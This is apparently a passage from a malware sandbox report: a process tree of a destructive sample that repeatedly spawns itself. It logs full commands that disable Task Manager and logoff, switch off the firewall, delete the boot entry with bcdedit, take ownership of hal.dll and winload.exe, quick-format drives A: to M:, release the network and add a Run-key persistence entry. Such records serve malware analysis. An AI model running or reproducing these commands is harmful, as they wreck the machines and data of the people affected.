        WScript ErrorCritico.vbs
        7⤵
        
        PID:8524
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8560
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8588
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8608
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:8628
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8672
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8724
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8764
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8792
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:8844
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:8880
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:8920
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:8940
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:8980
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:9032
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9060
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9196
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:7016
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:4128
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        
        PID:8464
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11184
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:12276
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:9828
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10164
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3292
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3324
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3340
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3356
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3392
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3836
    - - C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:3800
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        5⤵
        
        PID:4204
    - - C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        5⤵
        Modifies registry key
        
        PID:4292
    - - C:\Windows\system32\netsh.exe
        
        netsh advfirewall set allprofiles state off
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:4344
    - - C:\Windows\system32\bcdedit.exe
        
        bcdedit /delete {current}
        5⤵
        Modifies boot configuration data using bcdedit
        
        PID:4296
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:4804
    - - C:\Windows\system32\msg.exe
        
        msg * Virus detectado
        5⤵
        
        PID:5096
    - - C:\Windows\system32\msg.exe
        
        msg * Has sido hackeado!
        5⤵
        
        PID:4576
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\drivers" /r
        5⤵
        Possible privilege escalation attempt
        
        PID:4872
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\drivers" /reset /t /c /q
        5⤵
        
        PID:5096
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\drivers\*.*"
        5⤵
        
        PID:4908
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5232
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5252
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5260
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5268
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:5276
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:5288
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:5304
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\87A7.tmp\87A8.tmp\87A9.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:9936
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10856
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10908
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:11304
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:11832
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:10912
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:12876
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:13212
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:13104
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:1288
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:9524
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:6624
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:10108
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5316
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5332
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5344
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5368
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:5408
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\8EE7.tmp\8EE8.tmp\8EE9.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:10232
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:11196
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        Modifies file permissions
        
        PID:11220
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:11700
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2108
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Modifies file permissions
        
        PID:2332
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:12964
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:1500
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        Modifies file permissions
        
        PID:11236
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:7316
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:2776
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:10088
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:6936
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5432
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5464
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5480
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5488
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        
        PID:5524
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\91B5.tmp\931C.tmp\931D.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:10500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:10772
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:10356
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:10136
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:2752
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:12360
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2408
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:12540
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:12724
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        
        PID:1288
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:10028
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5172
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:6248
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:5556
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:5612
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:5636
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        
        PID:5660
    - - C:\Windows\system32\format.com
        
        format /y /q A:
        5⤵
        
        PID:5808
    - - C:\Windows\system32\format.com
        
        format /y /q B:
        5⤵
        
        PID:5216
    - - C:\Windows\system32\format.com
        
        format /y /q D:
        5⤵
        
        PID:6280
    - - C:\Windows\system32\format.com
        
        format /y /q E:
        5⤵
        
        PID:6644
    - - C:\Windows\system32\format.com
        
        format /y /q F:
        5⤵
        
        PID:6848
    - - C:\Windows\system32\format.com
        
        format /y /q G:
        5⤵
        
        PID:5240
    - - C:\Windows\system32\format.com
        
        format /y /q H:
        5⤵
        
        PID:7364
    - - C:\Windows\system32\format.com
        
        format /y /q I:
        5⤵
        
        PID:8320
    - - C:\Windows\system32\format.com
        
        format /y /q J:
        5⤵
        
        PID:9968
    - - C:\Windows\system32\format.com
        
        format /y /q K:
        5⤵
        
        PID:11504
    - - C:\Windows\system32\format.com
        
        format /y /q L:
        5⤵
        
        PID:12552
    - - C:\Windows\system32\format.com
        
        format /y /q M:
        5⤵
        
        PID:2408
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\vbisurf.ax"
        5⤵
        
        PID:6748
- - C:\Windows\explorer.exe
    explorer.exe
    3⤵
    PID:1608
- - C:\Windows\system32\notepad.exe
    notepad
    3⤵
    PID:1932
- - C:\Windows\system32\calc.exe
    calc
    3⤵
    PID:2500
- - C:\Windows\system32\mspaint.exe
    mspaint
    3⤵
    - Drops file in Windows directory
    - Suspicious use of SetWindowsHookEx
    PID:2492
- - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: CmdExeWriteProcessMemorySpam
    PID:2464
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C3DB.tmp\C3DC.tmp\C3DD.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
      4⤵
      Drops startup file
      PID:2132
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        5⤵
        
        PID:760
      - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        6⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:1776
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        5⤵
        Possible privilege escalation attempt
        
        PID:2768
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        5⤵
        
        PID:1648
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        5⤵
        Possible privilege escalation attempt
        Suspicious use of AdjustPrivilegeToken
        
        PID:2616
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        5⤵
        
        PID:2796
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        5⤵
        Views/modifies file attributes
        
        PID:2860
    - - C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:2228
    - - C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        5⤵
        
        PID:576
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        5⤵
        Views/modifies file attributes
        
        PID:2136
    - - C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        5⤵
        
        PID:2420
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        5⤵
        
        PID:1124
    - - C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        5⤵
        
        PID:2152
    - - C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        5⤵
        Gathers network information
        
        PID:2424
    - - C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        5⤵
        Adds Run key to start application
        
        PID:2668
    - - C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        5⤵
        Drops autorun.inf file
        
        PID:2560
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3140
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3484
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3512
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3520
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3540
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3564
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3584
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3596
    - - C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        5⤵
        
        PID:3612
    - - C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        5⤵
        
        PID:3620
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3636
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\EFFA.tmp\EFFB.tmp\EFFC.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:4960
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:4592
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        
        PID:7140
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4320
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:4344
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:3108
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4540
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:4208
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4712
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:4540
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Modifies file permissions
        
        PID:5140
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:5184
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5360
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5388
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6552
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5340
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6868
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        Views/modifies file attributes
        
        PID:7984
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8352
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:7920
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:7380
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8468
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:3408
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:2636
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:4104
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9176
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9312
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9436
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:9580
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:9624
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:9688
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:9796
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:9892
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:10016
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:10044
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10092
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10168
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        7⤵
        
        PID:6228
        
        C:\Windows\explorer.exe
        
        explorer.exe
        7⤵
        
        PID:7980
        
        C:\Windows\system32\notepad.exe
        
        notepad
        7⤵
        
        PID:10284
        
        C:\Windows\system32\calc.exe
        
        calc
        7⤵
        
        PID:10340
        
        C:\Windows\system32\mspaint.exe
        
        mspaint
        7⤵
        
        PID:10432
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:10488
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableLockWorkstation /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:572
        
        C:\Windows\system32\reg.exe
        
        reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v HideFastUserSwitching /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:13088
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoRun /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:11384
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoLogoff /t REG_DWORD /d 1 /f
        7⤵
        Modifies registry key
        
        PID:7188
    - - C:\Windows\explorer.exe
        
        explorer.exe
        5⤵
        
        PID:3648
    - - C:\Windows\system32\notepad.exe
        
        notepad
        5⤵
        
        PID:3672
    - - C:\Windows\system32\calc.exe
        
        calc
        5⤵
        
        PID:3684
    - - C:\Windows\system32\mspaint.exe
        
        mspaint
        5⤵
        Drops file in Windows directory
        Suspicious use of SetWindowsHookEx
        
        PID:3700
    - - C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        
        C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe
        5⤵
        Executes dropped EXE
        Suspicious behavior: CmdExeWriteProcessMemorySpam
        
        PID:3708
      - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\F096.tmp\F097.tmp\F098.bat C:\Users\Admin\AppData\Local\Temp\ADZP20Complex.exe"
        6⤵
        
        PID:4804
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /K Taskdl.bat
        7⤵
        
        PID:3724
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32" /r
        8⤵
        Modifies file permissions
        
        PID:6152
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winresume.exe"
        7⤵
        
        PID:4896
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winresume.exe" /reset /c /q
        7⤵
        
        PID:3296
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winresume.exe"
        7⤵
        Views/modifies file attributes
        
        PID:4688
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\winload.exe"
        7⤵
        Possible privilege escalation attempt
        
        PID:1916
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\winload.exe" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:4924
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\winload.exe"
        7⤵
        
        PID:4688
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\Windows\System32\hal.dll"
        7⤵
        
        PID:1916
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\Windows\System32\hal.dll" /reset /c /q
        7⤵
        Possible privilege escalation attempt
        
        PID:5168
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h "C:\Windows\System32\hal.dll"
        7⤵
        Views/modifies file attributes
        
        PID:5208
        
        C:\Windows\system32\wscript.exe
        
        WScript Informacion.vbs
        7⤵
        
        PID:5416
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SetCursorPos
        7⤵
        
        PID:5456
        
        C:\Windows\system32\rundll32.exe
        
        rundll32 user32.dll, SwapMouseButton
        7⤵
        
        PID:6580
        
        C:\Windows\system32\ipconfig.exe
        
        ipconfig /release
        7⤵
        Gathers network information
        
        PID:5456
        
        C:\Windows\system32\reg.exe
        
        reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v EthernetKill /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\EthernetKiller.cmd" /f
        7⤵
        
        PID:6840
        
        C:\Windows\system32\attrib.exe
        
        attrib -r -a -s -h *.*
        7⤵
        
        PID:8004
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:8408
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:8444
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:1256
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:3980
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:3772
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:4156
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9244
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
        7⤵
        
        PID:9356
        
        C:\Windows\system32\wscript.exe
        
        WScript ErrorCritico.vbs
        7⤵
        
        PID:9540
        
        C:\Windows\system32\wscript.exe
        
        WScript Advertencia.vbs
